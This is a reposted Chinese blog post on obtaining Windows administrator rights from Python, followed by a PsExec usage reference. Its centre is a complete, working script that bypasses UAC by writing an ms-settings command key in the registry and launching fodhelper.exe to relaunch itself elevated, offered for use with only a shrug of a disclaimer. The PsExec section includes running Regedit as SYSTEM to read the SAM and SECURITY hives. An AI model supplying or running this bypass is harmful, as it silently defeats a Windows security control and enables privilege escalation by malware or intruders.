(转载)python如果获取windows管理员权限(二)

本文为转载,链接:https://blog.csdn.net/qq_17550379/article/details/79006718

我们在python如果获取windows管理员权限(一)中谈到了UAC的问题。

很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。

当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯!

通过下面的代码我们可以轻松绕过UAC

# -*- coding: utf-8 -*-
"""
Created on Mon Jan  8 09:09:51 2018

@author: coordinate
"""
from __future__ import print_function
import os
import sys
import ctypes
if sys.version_info[0] == 3:
    import winreg as winreg
else:
    import _winreg as winreg
    
CMD                   = r"C:\Windows\System32\cmd.exe"
FOD_HELPER            = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD            = "python"
REG_PATH              = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_admin():
    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''    
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
    
def create_reg_key(key, value):
    '''
    Creates a reg key
    '''
    try:        
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
        winreg.CloseKey(registry_key)
    except WindowsError:        
        raise
        
def bypass_uac(cmd):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd)    
    except WindowsError:
        raise
        
def execute():        
    if not is_admin():
        print('[!] The script is NOT running with administrative privileges')
        print('[+] Trying to bypass the UAC')
        try:                
            current_dir = __file__
            cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
            bypass_uac(cmd)                
            os.system(FOD_HELPER)                
            sys.exit(0)                
        except WindowsError:
            sys.exit(1)
    else:
        #这里添加我们需要管理员权限的代码
        print('[+] The script is running with administrative privileges!')  
        
if __name__ == '__main__':
    execute()


其实我们这个代码这里主要是往注册表中添加了这两项
————————————————
版权声明:本文为CSDN博主「coordinate_blog」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_17550379/article/details/79006718

运行system权限工具psexec 用法:psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments] computer 指示 PsExec 在指定的一台或多台计算机上运行应用程序。如果省略计算机名称,则 PsExec 将在本地系统上运行应用程序;如果输入计算机名称“\\*”,则 PsExec 将在当前域中的所有计算机上运行应用程序。 @file 指示 PsExec 在指定的文本文件中列出的每台计算机上运行命令。 -a 用逗号分隔可以运行应用程序的处理器,CPU 编号最小为 1。例如,要在 CPU 2 和 CPU 4 上运行应用程序,请输入:“-a 2,4” -c 将指定的程序复制到远程系统以便执行。如果省略此选项,则应用程序必须位于远程系统上的系统路径中。 -d 不等待应用程序终止。请只对非交互式应用程序使用此选项。 -e 不加载指定帐户的配置文件。 -f 将指定的程序复制到远程系统,即使远程系统中已存在该文件。 -i 运行程序,以便它与远程系统中指定会话的桌面进行交互。如果未指定会话,则进程将在控制台会话中运行。 -l 以受限用户身份(去除 Administrators 组的权限,并且只允许使用分配给 Users 组的权限)运行进程。在 Windows Vista 上,此进程将以“低完整性”运行。 -n 指定与远程计算机连接的超时(秒)。 -p 指定用户名的密码(可选)。如果省略此选项,系统将提示您输入隐藏密码。 -s 在系统帐户中运行远程进程。 -u 指定用于登录远程计算机的可选用户名。 -v 仅在指定文件具有更高版本号或该文件比远程系统上的文件新时复制该文件。 -w 设置进程的工作目录(相对于远程计算机)。 -x 在 Winlogon 桌面上显示 UI(仅限于本地系统)。 -priority 指定 –low、-belownormal、-abovenormal、-high 或 -realtime 按不同优先级运行进程。 program 要执行的程序的名称。 arguments 要传递的参数(请注意,文件路径必须是目标系统中的绝对路径) 对于其名称中含有空格的应用程序,可以在其两侧加引号,例如,psexec \\marklap "c:\long name\app.exe"。按下 Enter 键时,仅将输入内容传递到远程系统。键入 Ctrl-C 可终止远程进程。 如果省略用户名,则远程进程将以执行 PsExec 时所使用的相同帐户运行,但由于远程进程以模仿方式运行,因此它无权访问远程系统上的网络资源。指定用户名时,远程进程将以指定的帐户执行,并可访问该帐户有权访问的任何网络资源。请注意,密码是以明文形式传递到远程系统的。 当目标系统是本地系统时,由于 PsExec 不需要您具有管理员权限,因此您可以使用当前版本的 PsExec 来取代 Runas。 以下命令可在 \\marklap 上启动交互式命令提示窗口: psexec \\marklap cmd 此命令通过 /all 开关在远程系统上执行 IpConfig,并在本地显示输出结果: psexec \\marklap ipconfig /all 此命令将程序 test.exe 复制到远程系统,并以交互方式执行此程序: psexec \\marklap -c test.exe 如果远程系统中已经安装的程序不在系统路径中,请指定该程序的完整路径: psexec \\marklap c:\bin\test.exe 在系统帐户中以交互方式运行 Regedit,以便查看 SAM 和 SECURITY 注册表项的内容: psexec -i -d -s c:\windows\regedit.exe 要以受限用户权限运行 Internet Explorer,请使用此命令: psexec -l -d "c:\program files\internet explorer\iexplore.exe"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值